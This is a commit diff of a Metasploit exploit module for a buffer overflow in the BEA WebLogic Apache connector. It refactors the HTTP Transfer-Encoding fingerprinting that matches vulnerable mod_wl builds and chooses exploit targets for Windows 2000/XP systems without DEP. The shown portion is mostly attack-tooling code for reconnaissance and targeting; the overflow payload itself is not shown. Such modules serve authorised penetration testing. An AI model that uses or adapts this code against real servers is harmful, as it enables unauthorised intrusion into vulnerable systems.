trying to improve bea weblogic connector bof
This commit is contained in:
parent
c0d17734ed
commit
e7f5bf132c
|
@ -22,12 +22,14 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
Weblogic Apache plugin.
|
Weblogic Apache plugin.
|
||||||
|
|
||||||
The connector fails to properly handle specially crafted HTTP POST
|
The connector fails to properly handle specially crafted HTTP POST
|
||||||
requests, resulting a buffer overflow due to the insecure usage
|
requests resulting in a buffer overflow due to the insecure usage
|
||||||
of sprintf. Currently, this module works over Windows systems without DEP,
|
of sprintf.
|
||||||
and has been tested with Windows 2000 / XP.
|
|
||||||
|
|
||||||
In addition, the Weblogic Apache plugin version is fingerprinted with a POST
|
The Weblogic Apache plugin version is fingerprinted with a POST
|
||||||
request containing a specially crafted Transfer-Encoding header.
|
request containing a specially crafted Transfer-Encoding header.
|
||||||
|
|
||||||
|
At this moment this module works over Windows systems without DEP
|
||||||
|
and has been tested with Windows 2000 / XP.
|
||||||
},
|
},
|
||||||
'Author' =>
|
'Author' =>
|
||||||
[
|
[
|
||||||
|
@ -84,52 +86,24 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
||||||
def check
|
def check
|
||||||
|
|
||||||
my_data = rand_text_alpha(rand(5) + 8)
|
fingerprint = fingerprint_mod_wl
|
||||||
res = send_request_cgi({
|
|
||||||
'method' => 'POST',
|
|
||||||
'uri' => target_uri.path,
|
|
||||||
'headers' =>
|
|
||||||
{
|
|
||||||
'Transfer-Encoding' => my_data
|
|
||||||
},
|
|
||||||
'data' => "#{my_data.length}\r\n#{my_data}\r\n0\r\n",
|
|
||||||
})
|
|
||||||
|
|
||||||
if res and res.code == 200
|
case fingerprint
|
||||||
|
when /Version found/
|
||||||
# BEA WebLogic 8.1 SP6 - mod_wl_20.so
|
|
||||||
if res.body =~ /Build date\/time:<\/B> <I>Jun 16 2006 15:14:11/ and
|
|
||||||
res.body =~ /Change Number:<\/B> <I>779586/
|
|
||||||
return Exploit::CheckCode::Vulnerable
|
return Exploit::CheckCode::Vulnerable
|
||||||
end
|
when /BEA WebLogic connector vulnerable/
|
||||||
|
|
||||||
# BEA WebLogic 8.1 SP5 - mod_wl_20.so
|
|
||||||
if res.body =~ /Build date\/time:<\/B> <I>Aug 5 2005 11:19:57/ and
|
|
||||||
res.body =~ /Change Number:<\/B> <I>616810/
|
|
||||||
return Exploit::CheckCode::Vulnerable
|
|
||||||
end
|
|
||||||
|
|
||||||
# BEA WebLogic 8.1 SP4 - mod_wl_20.so
|
|
||||||
if res.body =~ /Build date\/time:<\/B> <I>Oct 25 2004 09:25:23/ and
|
|
||||||
res.body =~ /Change Number:<\/B> <I>452998/
|
|
||||||
return Exploit::CheckCode::Vulnerable
|
|
||||||
end
|
|
||||||
|
|
||||||
# Check for dates prior to patch release
|
|
||||||
if res.body =~ /([A-Za-z]{3} [\s\d]{2} [\d]{4})/
|
|
||||||
build_date = Date.parse($1)
|
|
||||||
if build_date <= Date.parse("Jul 28 2008")
|
|
||||||
return Exploit::CheckCode::Appears
|
return Exploit::CheckCode::Appears
|
||||||
end
|
when /BEA WebLogic connector undefined/
|
||||||
end
|
return Exploit::CheckCode::Detected
|
||||||
|
when /BEA WebLogic connector no vulnerable/, /BEA WebLogic connector not found/
|
||||||
end
|
|
||||||
|
|
||||||
return Exploit::CheckCode::Safe
|
return Exploit::CheckCode::Safe
|
||||||
end
|
end
|
||||||
|
|
||||||
|
end
|
||||||
|
|
||||||
def exploit
|
def exploit
|
||||||
|
|
||||||
# Autodetect BEA mod_wl version
|
# Autodetect BEA mod_wl version
|
||||||
|
@ -159,6 +133,23 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
|
|
||||||
return target if target.name != 'Automatic'
|
return target if target.name != 'Automatic'
|
||||||
|
|
||||||
|
fingerprint = fingerprint_mod_wl
|
||||||
|
|
||||||
|
case fingerprint
|
||||||
|
when /BEA WebLogic 8.1 SP6 - mod_wl_20.so/
|
||||||
|
return targets[1]
|
||||||
|
when /BEA WebLogic 8.1 SP5 - mod_wl_20.so/
|
||||||
|
return targets[2]
|
||||||
|
when /BEA WebLogic 8.1 SP4 - mod_wl_20.so/
|
||||||
|
return targets[3]
|
||||||
|
else
|
||||||
|
return nil
|
||||||
|
end
|
||||||
|
|
||||||
|
end
|
||||||
|
|
||||||
|
def fingerprint_mod_wl
|
||||||
|
|
||||||
my_data = rand_text_alpha(rand(5) + 8)
|
my_data = rand_text_alpha(rand(5) + 8)
|
||||||
res = send_request_cgi(
|
res = send_request_cgi(
|
||||||
{
|
{
|
||||||
|
@ -171,22 +162,31 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
'data' => "#{my_data.length}\r\n#{my_data}\r\n0\r\n",
|
'data' => "#{my_data.length}\r\n#{my_data}\r\n0\r\n",
|
||||||
})
|
})
|
||||||
|
|
||||||
if res and res.code == 200
|
if res and res.code == 200 and res.body =~ /Weblogic Bridge Message/
|
||||||
# BEA WebLogic 8.1 SP6 - mod_wl_20.so
|
# BEA WebLogic 8.1 SP6 - mod_wl_20.so
|
||||||
if res.body =~ /Build date\/time:<\/B> <I>Jun 16 2006 15:14:11/ and
|
case res.body
|
||||||
res.body =~ /Change Number:<\/B> <I>779586/
|
when (/Build date\/time:<\/B> <I>Jun 16 2006 15:14:11/ and /Change Number:<\/B> <I>779586/)
|
||||||
return targets[1]
|
return "Version found: BEA WebLogic 8.1 SP6 - mod_wl_20.so"
|
||||||
# BEA WebLogic 8.1 SP5 - mod_wl_20.so
|
# BEA WebLogic 8.1 SP5 - mod_wl_20.so
|
||||||
elsif res.body =~ /Build date\/time:<\/B> <I>Aug 5 2005 11:19:57/ and
|
when (/Build date\/time:<\/B> <I>Aug 5 2005 11:19:57/ and /Change Number:<\/B> <I>616810/)
|
||||||
res.body =~ /Change Number:<\/B> <I>616810/
|
return "Version found: BEA WebLogic 8.1 SP5 - mod_wl_20.so"
|
||||||
return targets[2]
|
when (/Build date\/time:<\/B> <I>Oct 25 2004 09:25:23/ and /Change Number:<\/B> <I>452998/)
|
||||||
elsif res.body =~ /Build date\/time:<\/B> <I>Oct 25 2004 09:25:23/ and
|
return "Version found: BEA WebLogic 8.1 SP4 - mod_wl_20.so"
|
||||||
res.body =~ /Change Number:<\/B> <I>452998/
|
# Check for dates prior to patch release
|
||||||
return targets[3]
|
when /([A-Za-z]{3} [\s\d]{2} [\d]{4})/
|
||||||
|
build_date = Date.parse($1)
|
||||||
|
if build_date <= Date.parse("Jul 28 2008")
|
||||||
|
return "BEA WebLogic connector vulnerable"
|
||||||
|
else
|
||||||
|
return "BEA WebLogic connector no vulnerable"
|
||||||
|
end
|
||||||
|
else
|
||||||
|
return "BEA WebLogic connector undefined"
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
return nil
|
return "BEA WebLogic connector not found"
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
Loading…
Reference in New Issue